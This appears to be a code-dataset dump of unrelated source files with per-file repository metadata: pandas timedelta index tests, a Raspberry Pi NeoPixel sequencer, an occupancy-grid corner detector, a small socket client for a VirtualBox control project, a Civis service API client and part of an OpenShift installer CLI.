'1day 00:00:03', '1day 00:00:05'],
name='idx', freq=None)
cases = [(0, Timedelta('1day'), expected_0),
(-3, Timedelta('1day'), expected_0),
(3, Timedelta('1day 00:00:04'), expected_3),
(1, Timedelta('1day 00:00:01'), expected_1_nofreq),
(3, Timedelta('1day 00:00:05'), expected_3_nofreq)]
for n, d, expected in cases:
result = idx.insert(n, d)
tm.assert_index_equal(result, expected)
assert result.name == expected.name
assert result.freq == expected.freq
# GH 18295 (test missing)
expected = TimedeltaIndex(['1day', pd.NaT, '2day', '3day'])
for na in (np.nan, pd.NaT, None):
result = timedelta_range('1day', '3day').insert(1, na)
tm.assert_index_equal(result, expected)
def test_delete(self):
idx = timedelta_range(start='1 Days', periods=5, freq='D', name='idx')
# prserve freq
expected_0 = timedelta_range(start='2 Days', periods=4, freq='D',
name='idx')
expected_4 = timedelta_range(start='1 Days', periods=4, freq='D',
name='idx')
# reset freq to None
expected_1 = TimedeltaIndex(
['1 day', '3 day', '4 day', '5 day'], freq=None, name='idx')
cases = {0: expected_0,
-5: expected_0,
-1: expected_4,
4: expected_4,
1: expected_1}
for n, expected in cases.items():
result = idx.delete(n)
tm.assert_index_equal(result, expected)
assert result.name == expected.name
assert result.freq == expected.freq
with pytest.raises((IndexError, ValueError)):
# either depending on numpy version
idx.delete(5)
def test_delete_slice(self):
idx = timedelta_range(start='1 days', periods=10, freq='D', name='idx')
# prserve freq
expected_0_2 = timedelta_range(start='4 days', periods=7, freq='D',
name='idx')
expected_7_9 = timedelta_range(start='1 days', periods=7, freq='D',
name='idx')
# reset freq to None
expected_3_5 = TimedeltaIndex(['1 d', '2 d', '3 d',
'7 d', '8 d', '9 d', '10d'],
freq=None, name='idx')
cases = {(0, 1, 2): expected_0_2,
(7, 8, 9): expected_7_9,
(3, 4, 5): expected_3_5}
for n, expected in cases.items():
result = idx.delete(n)
tm.assert_index_equal(result, expected)
assert result.name == expected.name
assert result.freq == expected.freq
result = idx.delete(slice(n[0], n[-1] + 1))
tm.assert_index_equal(result, expected)
assert result.name == expected.name
assert result.freq == expected.freq
def test_get_loc(self):
idx = pd.to_timedelta(['0 days', '1 days', '2 days'])
for method in [None, 'pad', 'backfill', 'nearest']:
assert idx.get_loc(idx[1], method) == 1
assert idx.get_loc(idx[1].to_pytimedelta(), method) == 1
assert idx.get_loc(str(idx[1]), method) == 1
assert idx.get_loc(idx[1], 'pad',
tolerance=Timedelta(0)) == 1
assert idx.get_loc(idx[1], 'pad',
tolerance=np.timedelta64(0, 's')) == 1
assert idx.get_loc(idx[1], 'pad',
tolerance=timedelta(0)) == 1
with pytest.raises(ValueError, match='unit abbreviation w/o a number'):
idx.get_loc(idx[1], method='nearest', tolerance='foo')
with pytest.raises(
ValueError,
match='tolerance size must match'):
idx.get_loc(idx[1], method='nearest',
tolerance=[Timedelta(0).to_timedelta64(),
Timedelta(0).to_timedelta64()])
for method, loc in [('pad', 1), ('backfill', 2), ('nearest', 1)]:
assert idx.get_loc('1 day 1 hour', method) == loc
# GH 16909
assert idx.get_loc(idx[1].to_timedelta64()) == 1
# GH 16896
assert idx.get_loc('0 days') == 0
def test_get_loc_nat(self):
tidx = TimedeltaIndex(['1 days 01:00:00', 'NaT', '2 days 01:00:00'])
assert tidx.get_loc(pd.NaT) == 1
assert tidx.get_loc(None) == 1
assert tidx.get_loc(float('nan')) == 1
assert tidx.get_loc(np.nan) == 1
def test_get_indexer(self):
idx = pd.to_timedelta(['0 days', '1 days', '2 days'])
tm.assert_numpy_array_equal(idx.get_indexer(idx),
np.array([0, 1, 2], dtype=np.intp))
target = pd.to_timedelta(['-1 hour', '12 hours', '1 day 1 hour'])
tm.assert_numpy_array_equal(idx.get_indexer(target, 'pad'),
np.array([-1, 0, 1], dtype=np.intp))
tm.assert_numpy_array_equal(idx.get_indexer(target, 'backfill'),
np.array([0, 1, 2], dtype=np.intp))
tm.assert_numpy_array_equal(idx.get_indexer(target, 'nearest'),
np.array([0, 1, 1], dtype=np.intp))
res = idx.get_indexer(target, 'nearest',
tolerance=Timedelta('1 hour'))
tm.assert_numpy_array_equal(res, np.array([0, -1, 1], dtype=np.intp))
|
bsd-3-clause
| 4,502,410,124,735,251,000
| 38.860947
| 79
| 0.5036
| false
| 3.850529
| true
| false
| false
|
Grumpy-Mike/Mikes-Pi-Bakery
|
Tap-A-LED_part2/software/Sequencer/sequencer1.py
|
1
|
3282
|
#!/usr/bin/env python3
# Sequencer1 by Mike Cook August 2020
#Plays samples from a file
import time
from pygame import mixer
import board
import neopixel
from caltap import CalTap
def main():
global markTime, stepTime
init()
print("Sequencer - playing samples through the audio output")
print("Tap to add or remove samples")
t = float(input("Please enter the speed in BPM "))
stepTime = 1/((t/60)*4) # assume 4 beats in a bar
tapCount = 0
beingTouched = False
while 1:
if time.time() - markTime >= stepTime :
markTime = time.time()
nextStep()
if tap.touched() and not beingTouched:
pos = tap.getPos()
if pos[3] : # a valid reading
if pixels[pos[2]] != [0, 0, 0]:
pixels[pos[2]] = (0, 0, 0) # turn off
else:
pixels[pos[2]] = colours[pos[1]]
tapCount += 1
if tapCount >= len(colours) : tapCount = 0
beingTouched = True
pixels.show()
else :
if not tap.touched() : beingTouched = False
def init():
global colours, tap, pixels, posScan , stepTime, markTime
global colBuffer, sounds
# put your own colours here
colours = [(255, 0, 0), (255, 72, 0), (255, 145, 0),
(255, 218, 0), (218, 255, 0), (145, 255, 0),
(72, 255, 0), (0, 255, 0), (255,255,255) ]
tap = CalTap()
pixel_pin = board.D18
num_pixels = 128
# RGB or GRB. Some NeoPixels have red and green reversed
ORDER = neopixel.GRB
BRIGHTNESS = 0.1 # 0.6 is maximum brightness for 3A external supply
pixels = neopixel.NeoPixel(pixel_pin, num_pixels,
brightness = BRIGHTNESS, auto_write = False,
pixel_order = ORDER)
pixels.fill((0, 0, 0))
posScan = 0 ; stepTime = 0.3 ; markTime = time.time()
colBuffer = [(0,0,0)] * 8
mixer.pre_init(44100, -16, 12, 512)
mixer.init()
# change these to other sample names
soundNames = ["0", "1",
"2", "3",
"4", "5",
"6", "7" ]
# change Marimba to another directory containing your samples
sounds = [ mixer.Sound("Marimba/"+
soundNames[i]+".wav")
for i in range(0,len(soundNames))]
mixer.set_num_channels(16)
def nextStep():
global posScan
putCol(posScan)
posScan +=1
if posScan > 15 : posScan = 0
getCol(posScan)
for i in range(8):
pixels[i + posScan * 8] = dimCol(i)
pixels.show()
def dimCol(i):
thresh = 40
r = colBuffer[i][0]
g = colBuffer[i][1]
b = colBuffer[i][2]
if r > thresh :
r -= thresh
else: r += thresh
if g > thresh :
g -= thresh
else: g += thresh
if b > thresh :
b -= thresh
else: b += thresh
return ( r, g, b )
def putCol(pos): # restore old column of colours
for i in range(8):
pixels[i + pos * 8] = colBuffer[i]
def getCol(pos):
for i in range(8):
colBuffer[i] = pixels[i + pos * 8]
#print(colBuffer[i])
if (colBuffer[i] != [0, 0, 0]):
sounds[i].play()
# Main program logic:
if __name__ == '__main__':
main()
|
gpl-2.0
| -6,181,341,447,900,539,000
| 29.110092
| 71
| 0.532297
| false
| 3.345566
| false
| false
| false
|
Altair3/Tanks
|
bzagents/uberagent/ObstacleList.py
|
1
|
3631
|
from OccGrid import OccGrid
from geo import Point,Line
class ObstacleList(object):
def __init__(self, occgrid):
self.occgrid = occgrid
self.yMax = occgrid.yMax
self.yMin = self.yMax * -1
self.xMax = occgrid.xMax
self.xMin = self.xMax * -1
self.daList = []
self.threshold = .6
self.neighborCheckNumber = 1
def getObstaclePoints(self):
return self.daList
def removeCornersInBlock(self, x, y, length):
for p in self.daList:
pX = p.x
pY = p.y
if (pX <= (x+length)) and (pX >= x):
if (pY <= (y+length)) and (pY >= y):
self.daList.remove(p)
def scanGrid(self, startX, startY, length):
length = 100
self.removeCornersInBlock(startX, startY, length)
for x in range(startX, (startX+length+1)):
for y in range(startY, (startY+length+1)):
if (x < self.xMin) or (x > self.xMax) or (y < self.yMin) or (y > self.yMax):
continue
#print "Scanning:", "(" + str(x) + "," + str(y) + ")"
if self.isCorner(x,y):
self.daList.append(Point(x,y))
def isCorner(self, x, y):
if self.occgrid.get(x, y) >= self.threshold:
up = self.checkUp(x,y)
down = self.checkDown(x,y)
left = self.checkLeft(x,y)
right = self.checkRight(x,y)
if (up and left):
if ((not down) and (not right)):
return True
else:
return False
if (up and right):
if ((not down) and (not left)):
return True
else:
return False
if (down and left):
if ((not up) and (not right)):
return True
else:
return False
if (down and right):
if ((not up) and (not left)):
return True
else:
return False
return False
def checkUp(self, x, y):
number = 0
for i in range(1, self.neighborCheckNumber+1):
if (y + i) <= self.yMax:
prob = self.occgrid.get(x, (y+i))
if prob < self.threshold:
return False
return True
def checkDown(self, x, y):
for i in range(self.neighborCheckNumber, 0, -1):
if (y - i) >= self.yMin:
prob = self.occgrid.get(x, (y-i))
if prob < self.threshold:
return False
return True
def checkRight(self, x, y):
for i in range(1, self.neighborCheckNumber+1):
if (x + i) <= self.xMax:
prob = self.occgrid.get((x+i), y)
if prob < self.threshold:
return False
return True
def checkLeft(self, x, y):
for i in range(self.neighborCheckNumber, 0, -1):
if (x - i) >= self.xMin:
prob = self.occgrid.get((x-i), y)
if prob < self.threshold:
return False
return True
|
gpl-3.0
| 5,781,750,627,482,786,000
| 29.258333
| 92
| 0.41366
| false
| 4.212297
| false
| false
| false
|
caiorss/vboxcontrol
|
commandClient.py
|
1
|
4394
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
"""
from subprocess import PIPE, Popen
import platform
import os
import sys
import re
import zlib
from socket import socket
from socket import AF_INET, SOCK_STREAM, SHUT_RDWR
from socket import SOL_SOCKET, SO_REUSEADDR
localhost = '127.0.0.1'
allhosts = '0.0.0.0'
import logging
import logging.config
LOG_SETTINGS = {
# --------- GENERAL OPTIONS ---------#
'version': 1,
'disable_existing_loggers': False,
'root': {
'level': 'NOTSET',
'handlers': ['file'],
},
#---------- HANDLERS ---------------#
'handlers': {
'console': {
'class': 'logging.StreamHandler',
'level': 'NOTSET',
'formatter': 'detailed',
'stream': 'ext://sys.stdout',
},
'file': {
'class': 'logging.handlers.RotatingFileHandler',
'level': 'NOTSET',
'formatter': 'detailed',
'filename': 'client.log',
'mode': 'a',
'maxBytes': 10485760,
'backupCount': 5,
},
'tcp' : {
'class' : 'logging.handlers.SocketHandler',
'level' : 'INFO',
'host' : '192.168.1.2',
'port' : 9020,
'formatter': 'detailed',
},
},
# ----- FORMATTERS -----------------#
'formatters': {
'detailed': {
'format': '%(asctime)s %(module)-17s line:%(lineno)-4d %(funcName)s() ' \
'%(levelname)-8s %(message)s',
},
'verbose': {
'format': '%(levelname)-8s %(asctime)s %(module)s %(process)d %(thread)d %(message)s',
'datefmt': '%a, %d %b %Y %H:%M:%S'
},
'email': {
'format': 'Timestamp: %(asctime)s\nModule: %(module)s\n' \
'Line: %(lineno)d\nMessage: %(message)s',
},
},
}
logging.config.dictConfig(LOG_SETTINGS)
logger = logging.getLogger('root')
class Client(object):
"""
Stream socket server class -- no definitive name
"""
def __init__(self, host, port, buffersize=1024):
self.host = host
self.port = port
self.buffersize = 1024
# Clients IP's connected to this server
self.clients = []
# Client Sockets List
self.connst = []
self.sock = None
self.mode = "shell"
def connect(self):
"""
Try only one time connect to server,
if successfully connected returns True,
False otherwise.
"""
# create socket handler
s = socket(AF_INET, SOCK_STREAM)
self.sock = s
try:
self.sock.connect((self.host, self.port))
return True
except:
return False
def connect_wait(self):
"""
Keep Trying to connect to server, forever,
even if server is down
"""
s = socket(AF_INET, SOCK_STREAM)
s.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
self.sock = s
logger.info("Client waiting server connection")
while True:
try:
self.sock.connect((self.host, self.port))
self.sendc("Client v%s Started from %s - %s " % ( VERSION, os.getcwd(), platform.platform() ))
break
except:
pass
logger.info("Client connected to server OK")
def sendc(self, msg):
"""
Send flow control message to client
"""
self.sock.sendall(msg)
def recevc(self):
"""
Receive control message from client module
"""
logger.info("wainting token")
while True:
data = self.sock.recv(self.buffersize)
#print data
if not data:
continue
else:
# logger.debug("len(data) =%s" % len(data))
# data2 = zlib.decompress(data)
# logger.debug("len(data2) =%s" % len(data2))
return data
def handling_connections(self):
pass
def send(self):
pass
class CommandClient(Client):
def __init__(self, host, port, buffersize):
super(CommandClient, self).__init__(host=host, port=port, buffersize=buffersize)
c = CommandClient(host='localhost', port=9090, buffersize=1024)
c.connect()
c.sendc("Hello world server")
|
unlicense
| 8,847,994,244,525,383,000
| 23.016393
| 110
| 0.506827
| false
| 3.923214
| false
| false
| false
|
civisanalytics/civis-python
|
civis/service_client.py
|
1
|
8958
|
from collections import OrderedDict
from functools import lru_cache
import json
from jsonref import JsonRef
import re
import requests
import warnings
from civis import APIClient
from civis.base import CivisAPIError, Endpoint, tostr_urljoin
from civis.resources._resources import parse_method
from civis._utils import to_camelcase
def _get_service(client):
if client._api_key:
api_client = APIClient(client._api_key)
else:
api_client = APIClient()
service = api_client.services.get(client._service_id)
return service
def auth_service_session(session, client):
service = _get_service(client)
auth_url = service['current_deployment']['displayUrl']
# Make request for adding Authentication Cookie to session
session.get(auth_url)
def _parse_service_path(path, operations, root_path=None):
""" Parse an endpoint into a class where each valid http request
on that endpoint is converted into a convenience function and
attached to the class as a method.
"""
if root_path is not None:
path = path.replace(root_path, '')
path = path.strip('/')
modified_base_path = re.sub("-", "_", path.split('/')[0].lower())
methods = []
for verb, op in operations.items():
method = parse_method(verb, op, path)
if method is None:
continue
methods.append(method)
return modified_base_path, methods
def parse_service_api_spec(api_spec, root_path=None):
"""Dynamically create classes to interface with a Civis Service API.
Parse an OpenAPI (Swagger) specification into a dictionary of classes
where each class represents an endpoint resource and contains
methods to make http requests on that resource.
Parameters
----------
api_spec : OrderedDict
The Civis Service API specification to parse. References should be
resolved before passing, typically using jsonref.JsonRef().
root_path : str, optional
An additional path for APIs that are not hosted on the service's
root level. An example root_path would be '/api' for an app with
resource endpoints that all begin with '/api'.
"""
paths = api_spec['paths']
classes = {}
for path, ops in paths.items():
base_path, methods = _parse_service_path(
path, ops, root_path=root_path)
class_name = to_camelcase(base_path)
if methods and classes.get(base_path) is None:
classes[base_path] = type(str(class_name),
(ServiceEndpoint,),
{})
for method_name, method in methods:
setattr(classes[base_path], method_name, method)
return classes
class ServiceEndpoint(Endpoint):
def __init__(self, client,
return_type='civis'):
self._return_type = return_type
self._client = client
def _build_path(self, path):
if not path:
return self._client._base_url
if not self._client._root_path:
return tostr_urljoin(self._client._base_url, path.strip("/"))
return tostr_urljoin(self._client._base_url,
self._client._root_path.strip("/"),
path.strip("/"))
def _make_request(self, method, path=None, params=None, data=None,
**kwargs):
url = self._build_path(path)
with requests.Session() as sess:
auth_service_session(sess, self._client)
with self._lock:
response = sess.request(method, url, json=data,
params=params, **kwargs)
if not response.ok:
raise CivisAPIError(response)
return response
class ServiceClient():
def __init__(self, service_id, root_path=None,
swagger_path="/endpoints", api_key=None,
return_type='snake', local_api_spec=None):
"""Create an API Client from a Civis service.
Parameters
----------
service_id : str, required
The Id for the service that will be used to generate the client.
root_path : str, optional
An additional path for APIs that are not hosted on the service's
root level. An example root_path would be '/api' for an app with
resource endpoints that all begin with '/api'.
swagger_path : str, optional
The endpoint path that will be used to download the API Spec.
The default value is '/endpoints' but another common path
might be '/spec'. The API Spec must be compliant with Swagger
2.0 standards.
api_key : str, optional
Your API key obtained from the Civis Platform. If not given, the
client will use the :envvar:`CIVIS_API_KEY` environment variable.
This API key will need to be authorized to access the service
used for the client.
return_type : str, optional
The following types are implemented:
- ``'raw'`` Returns the raw :class:`requests:requests.Response`
object.
- ``'snake'`` Returns a :class:`civis.response.Response` object
for the json-encoded content of a response. This maps the
top-level json keys to snake_case.
- ``'pandas'`` Returns a :class:`pandas:pandas.DataFrame` for
list-like responses and a :class:`pandas:pandas.Series` for
single a json response.
local_api_spec : collections.OrderedDict or string, optional
The methods on this class are dynamically built from the Service
API specification, which can be retrieved from the /endpoints
endpoint. When local_api_spec is None, the default, this
specification is downloaded the first time APIClient is
instantiated. Alternatively, a local cache of the specification
may be passed as either an OrderedDict or a filename which
points to a json file.
"""
if return_type not in ['snake', 'raw', 'pandas']:
raise ValueError("Return type must be one of 'snake', 'raw', "
"'pandas'")
self._api_key = api_key
self._service_id = service_id
self._base_url = self.get_base_url()
self._root_path = root_path
self._swagger_path = swagger_path
classes = self.generate_classes_maybe_cached(local_api_spec)
for class_name, klass in classes.items():
setattr(self, class_name, klass(client=self,
return_type=return_type))
def parse_path(self, path, operations):
""" Parse an endpoint into a class where each valid http request
on that endpoint is converted into a convenience function and
attached to the class as a method.
"""
warnings.warn("This method is deprecated and will be removed in "
"v2.0.0. Use the `_parse_service_path` function "
"instead.")
return _parse_service_path(path, operations, root_path=self._root_path)
def parse_api_spec(self, api_spec):
warnings.warn("This method is deprecated and will be removed in "
"v2.0.0. Use the `parse_service_api_spec` function "
"instead.")
return parse_service_api_spec(api_spec, root_path=self._root_path)
@lru_cache(maxsize=4)
def get_api_spec(self):
swagger_url = self._base_url + self._swagger_path
with requests.Session() as sess:
auth_service_session(sess, self)
response = sess.get(swagger_url)
response.raise_for_status()
spec = response.json(object_pairs_hook=OrderedDict)
return spec
@lru_cache(maxsize=4)
def generate_classes(self):
raw_spec = self.get_api_spec()
spec = JsonRef.replace_refs(raw_spec)
return parse_service_api_spec(spec, root_path=self._root_path)
def get_base_url(self):
service = _get_service(self)
return service['current_url']
def generate_classes_maybe_cached(self, cache):
"""Generate class objects either from /endpoints or a local cache."""
if cache is None:
classes = self.generate_classes()
else:
if isinstance(cache, OrderedDict):
raw_spec = cache
elif isinstance(cache, str):
with open(cache, "r") as f:
raw_spec = json.load(f, object_pairs_hook=OrderedDict)
else:
msg = "cache must be an OrderedDict or str, given {}"
raise ValueError(msg.format(type(cache)))
spec = JsonRef.replace_refs(raw_spec)
classes = parse_service_api_spec(spec, root_path=self._root_path)
return classes
|
bsd-3-clause
| 3,145,371,179,698,265,000
| 39.170404
| 79
| 0.605492
| false
| 4.335915
| false
| false
| false
|
spinolacastro/openshift-ansible
|
utils/src/ooinstall/cli_installer.py
|
1
|
31532
|
# TODO: Temporarily disabled due to importing old code into openshift-ansible
# repo. We will work on these over time.
# pylint: disable=bad-continuation,missing-docstring,no-self-use,invalid-name,no-value-for-parameter
import click
import os
import re
import sys
from ooinstall import openshift_ansible
from ooinstall import OOConfig
from ooinstall.oo_config import OOConfigInvalidHostError
from ooinstall.oo_config import Host
from ooinstall.variants import find_variant, get_variant_version_combos
DEFAULT_ANSIBLE_CONFIG = '/usr/share/atomic-openshift-utils/ansible.cfg'
DEFAULT_PLAYBOOK_DIR = '/usr/share/ansible/openshift-ansible/'
def validate_ansible_dir(path):
if not path:
raise click.BadParameter('An ansible path must be provided')
return path
# if not os.path.exists(path)):
# raise click.BadParameter("Path \"{}\" doesn't exist".format(path))
def is_valid_hostname(hostname):
if not hostname or len(hostname) > 255:
return False
if hostname[-1] == ".":
hostname = hostname[:-1] # strip exactly one dot from the right, if present
allowed = re.compile(r"(?!-)[A-Z\d-]{1,63}(?<!-)$", re.IGNORECASE)
return all(allowed.match(x) for x in hostname.split("."))
def validate_prompt_hostname(hostname):
if '' == hostname or is_valid_hostname(hostname):
return hostname
raise click.BadParameter('Invalid hostname. Please double-check this value and re-enter it.')
def get_ansible_ssh_user():
click.clear()
message = """
This installation process will involve connecting to remote hosts via ssh. Any
account may be used however if a non-root account is used it must have
passwordless sudo access.
"""
click.echo(message)
return click.prompt('User for ssh access', default='root')
def list_hosts(hosts):
hosts_idx = range(len(hosts))
for idx in hosts_idx:
click.echo(' {}: {}'.format(idx, hosts[idx]))
def delete_hosts(hosts):
while True:
list_hosts(hosts)
del_idx = click.prompt('Select host to delete, y/Y to confirm, ' \
'or n/N to add more hosts', default='n')
try:
del_idx = int(del_idx)
hosts.remove(hosts[del_idx])
except IndexError:
click.echo("\"{}\" doesn't match any hosts listed.".format(del_idx))
except ValueError:
try:
response = del_idx.lower()
if response in ['y', 'n']:
return hosts, response
click.echo("\"{}\" doesn't coorespond to any valid input.".format(del_idx))
except AttributeError:
click.echo("\"{}\" doesn't coorespond to any valid input.".format(del_idx))
return hosts, None
def collect_hosts(oo_cfg, existing_env=False, masters_set=False, print_summary=True):
"""
Collect host information from user. This will later be filled in using
ansible.
Returns: a list of host information collected from the user
"""
click.clear()
click.echo('*** Host Configuration ***')
message = """
You must now specify the hosts that will compose your OpenShift cluster.
Please enter an IP or hostname to connect to for each system in the cluster.
You will then be prompted to identify what role you would like this system to
serve in the cluster.
OpenShift Masters serve the API and web console and coordinate the jobs to run
across the environment. If desired you can specify multiple Master systems for
an HA deployment, in which case you will be prompted to identify a *separate*
system to act as the load balancer for your cluster after all Masters and Nodes
are defined.
If only one Master is specified, an etcd instance embedded within the OpenShift
Master service will be used as the datastore. This can be later replaced with a
separate etcd instance if desired. If multiple Masters are specified, a
separate etcd cluster will be configured with each Master serving as a member.
Any Masters configured as part of this installation process will also be
configured as Nodes. This is so that the Master will be able to proxy to Pods
from the API. By default this Node will be unschedulable but this can be changed
after installation with 'oadm manage-node'.
OpenShift Nodes provide the runtime environments for containers. They will
host the required services to be managed by the Master.
http://docs.openshift.com/enterprise/latest/architecture/infrastructure_components/kubernetes_infrastructure.html#master
http://docs.openshift.com/enterprise/latest/architecture/infrastructure_components/kubernetes_infrastructure.html#node
"""
click.echo(message)
hosts = []
more_hosts = True
num_masters = 0
while more_hosts:
host_props = {}
host_props['connect_to'] = click.prompt('Enter hostname or IP address',
value_proc=validate_prompt_hostname)
if not masters_set:
if click.confirm('Will this host be an OpenShift Master?'):
host_props['master'] = True
num_masters += 1
if oo_cfg.settings['variant_version'] == '3.0':
masters_set = True
host_props['node'] = True
host_props['containerized'] = False
if oo_cfg.settings['variant_version'] != '3.0':
rpm_or_container = click.prompt('Will this host be RPM or Container based (rpm/container)?',
type=click.Choice(['rpm', 'container']),
default='rpm')
if rpm_or_container == 'container':
host_props['containerized'] = True
if existing_env:
host_props['new_host'] = True
else:
host_props['new_host'] = False
host = Host(**host_props)
hosts.append(host)
if print_summary:
print_installation_summary(hosts, oo_cfg.settings['variant_version'])
# If we have one master, this is enough for an all-in-one deployment,
# thus we can start asking if you wish to proceed. Otherwise we assume
# you must.
if masters_set or num_masters != 2:
more_hosts = click.confirm('Do you want to add additional hosts?')
if num_masters >= 3:
collect_master_lb(hosts)
return hosts
def print_installation_summary(hosts, version=None):
"""
Displays a summary of all hosts configured thus far, and what role each
will play.
Shows total nodes/masters, hints for performing/modifying the deployment
with additional setup, warnings for invalid or sub-optimal configurations.
"""
click.clear()
click.echo('*** Installation Summary ***\n')
click.echo('Hosts:')
for host in hosts:
print_host_summary(hosts, host)
masters = [host for host in hosts if host.master]
nodes = [host for host in hosts if host.node]
dedicated_nodes = [host for host in hosts if host.node and not host.master]
click.echo('')
click.echo('Total OpenShift Masters: %s' % len(masters))
click.echo('Total OpenShift Nodes: %s' % len(nodes))
if len(masters) == 1 and version != '3.0':
ha_hint_message = """
NOTE: Add a total of 3 or more Masters to perform an HA installation."""
click.echo(ha_hint_message)
elif len(masters) == 2:
min_masters_message = """
WARNING: A minimum of 3 masters are required to perform an HA installation.
Please add one more to proceed."""
click.echo(min_masters_message)
elif len(masters) >= 3:
ha_message = """
NOTE: Multiple Masters specified, this will be an HA deployment with a separate
etcd cluster. You will be prompted to provide the FQDN of a load balancer once
finished entering hosts."""
click.echo(ha_message)
dedicated_nodes_message = """
WARNING: Dedicated Nodes are recommended for an HA deployment. If no dedicated
Nodes are specified, each configured Master will be marked as a schedulable
Node."""
min_ha_nodes_message = """
WARNING: A minimum of 3 dedicated Nodes are recommended for an HA
deployment."""
if len(dedicated_nodes) == 0:
click.echo(dedicated_nodes_message)
elif len(dedicated_nodes) < 3:
click.echo(min_ha_nodes_message)
click.echo('')
def print_host_summary(all_hosts, host):
click.echo("- %s" % host.connect_to)
if host.master:
click.echo(" - OpenShift Master")
if host.node:
if host.is_dedicated_node():
click.echo(" - OpenShift Node (Dedicated)")
elif host.is_schedulable_node(all_hosts):
click.echo(" - OpenShift Node")
else:
click.echo(" - OpenShift Node (Unscheduled)")
if host.master_lb:
if host.preconfigured:
click.echo(" - Load Balancer (Preconfigured)")
else:
click.echo(" - Load Balancer (HAProxy)")
if host.master:
if host.is_etcd_member(all_hosts):
click.echo(" - Etcd Member")
else:
click.echo(" - Etcd (Embedded)")
def collect_master_lb(hosts):
"""
Get a valid load balancer from the user and append it to the list of
hosts.
Ensure user does not specify a system already used as a master/node as
this is an invalid configuration.
"""
message = """
Setting up High Availability Masters requires a load balancing solution.
Please provide a the FQDN of a host that will be configured as a proxy. This
can be either an existing load balancer configured to balance all masters on
port 8443 or a new host that will have HAProxy installed on it.
If the host provided does is not yet configured, a reference haproxy load
balancer will be installed. It's important to note that while the rest of the
environment will be fault tolerant this reference load balancer will not be.
It can be replaced post-installation with a load balancer with the same
hostname.
"""
click.echo(message)
host_props = {}
# Using an embedded function here so we have access to the hosts list:
def validate_prompt_lb(hostname):
# Run the standard hostname check first:
hostname = validate_prompt_hostname(hostname)
# Make sure this host wasn't already specified:
for host in hosts:
if host.connect_to == hostname and (host.master or host.node):
raise click.BadParameter('Cannot re-use "%s" as a load balancer, '
'please specify a separate host' % hostname)
return hostname
host_props['connect_to'] = click.prompt('Enter hostname or IP address',
value_proc=validate_prompt_lb)
install_haproxy = click.confirm('Should the reference haproxy load balancer be installed on this host?')
host_props['preconfigured'] = not install_haproxy
host_props['master'] = False
host_props['node'] = False
host_props['master_lb'] = True
master_lb = Host(**host_props)
hosts.append(master_lb)
def confirm_hosts_facts(oo_cfg, callback_facts):
hosts = oo_cfg.hosts
click.clear()
message = """
A list of the facts gathered from the provided hosts follows. Because it is
often the case that the hostname for a system inside the cluster is different
from the hostname that is resolveable from command line or web clients
these settings cannot be validated automatically.
For some cloud providers the installer is able to gather metadata exposed in
the instance so reasonable defaults will be provided.
Plese confirm that they are correct before moving forward.
"""
notes = """
Format:
connect_to,IP,public IP,hostname,public hostname
Notes:
* The installation host is the hostname from the installer's perspective.
* The IP of the host should be the internal IP of the instance.
* The public IP should be the externally accessible IP associated with the instance
* The hostname should resolve to the internal IP from the instances
themselves.
* The public hostname should resolve to the external ip from hosts outside of
the cloud.
"""
# For testing purposes we need to click.echo only once, so build up
# the message:
output = message
default_facts_lines = []
default_facts = {}
for h in hosts:
if h.preconfigured == True:
continue
default_facts[h.connect_to] = {}
h.ip = callback_facts[h.connect_to]["common"]["ip"]
h.public_ip = callback_facts[h.connect_to]["common"]["public_ip"]
h.hostname = callback_facts[h.connect_to]["common"]["hostname"]
h.public_hostname = callback_facts[h.connect_to]["common"]["public_hostname"]
default_facts_lines.append(",".join([h.connect_to,
h.ip,
h.public_ip,
h.hostname,
h.public_hostname]))
output = "%s\n%s" % (output, ",".join([h.connect_to,
h.ip,
h.public_ip,
h.hostname,
h.public_hostname]))
output = "%s\n%s" % (output, notes)
click.echo(output)
facts_confirmed = click.confirm("Do the above facts look correct?")
if not facts_confirmed:
message = """
Edit %s with the desired values and run `atomic-openshift-installer --unattended install` to restart the install.
""" % oo_cfg.config_path
click.echo(message)
# Make sure we actually write out the config file.
oo_cfg.save_to_disk()
sys.exit(0)
return default_facts
def check_hosts_config(oo_cfg, unattended):
click.clear()
masters = [host for host in oo_cfg.hosts if host.master]
if len(masters) == 2:
click.echo("A minimum of 3 Masters are required for HA deployments.")
sys.exit(1)
if len(masters) > 1:
master_lb = [host for host in oo_cfg.hosts if host.master_lb]
if len(master_lb) > 1:
click.echo('ERROR: More than one Master load balancer specified. Only one is allowed.')
sys.exit(1)
elif len(master_lb) == 1:
if master_lb[0].master or master_lb[0].node:
click.echo('ERROR: The Master load balancer is configured as a master or node. Please correct this.')
sys.exit(1)
else:
message = """
ERROR: No master load balancer specified in config. You must provide the FQDN
of a load balancer to balance the API (port 8443) on all Master hosts.
https://docs.openshift.org/latest/install_config/install/advanced_install.html#multiple-masters
"""
click.echo(message)
sys.exit(1)
dedicated_nodes = [host for host in oo_cfg.hosts if host.node and not host.master]
if len(dedicated_nodes) == 0:
message = """
WARNING: No dedicated Nodes specified. By default, colocated Masters have
their Nodes set to unschedulable. If you proceed all nodes will be labelled
as schedulable.
"""
if unattended:
click.echo(message)
else:
confirm_continue(message)
return
def get_variant_and_version(multi_master=False):
message = "\nWhich variant would you like to install?\n\n"
i = 1
combos = get_variant_version_combos()
for (variant, version) in combos:
message = "%s\n(%s) %s %s" % (message, i, variant.description,
version.name)
i = i + 1
message = "%s\n" % message
click.echo(message)
if multi_master:
click.echo('NOTE: 3.0 installations are not')
response = click.prompt("Choose a variant from above: ", default=1)
product, version = combos[response - 1]
return product, version
def confirm_continue(message):
if message:
click.echo(message)
click.confirm("Are you ready to continue?", default=False, abort=True)
return
def error_if_missing_info(oo_cfg):
missing_info = False
if not oo_cfg.hosts:
missing_info = True
click.echo('For unattended installs, hosts must be specified on the '
'command line or in the config file: %s' % oo_cfg.config_path)
sys.exit(1)
if 'ansible_ssh_user' not in oo_cfg.settings:
click.echo("Must specify ansible_ssh_user in configuration file.")
sys.exit(1)
# Lookup a variant based on the key we were given:
if not oo_cfg.settings['variant']:
click.echo("No variant specified in configuration file.")
sys.exit(1)
ver = None
if 'variant_version' in oo_cfg.settings:
ver = oo_cfg.settings['variant_version']
variant, version = find_variant(oo_cfg.settings['variant'], version=ver)
if variant is None or version is None:
err_variant_name = oo_cfg.settings['variant']
if ver:
err_variant_name = "%s %s" % (err_variant_name, ver)
click.echo("%s is not an installable variant." % err_variant_name)
sys.exit(1)
oo_cfg.settings['variant_version'] = version.name
missing_facts = oo_cfg.calc_missing_facts()
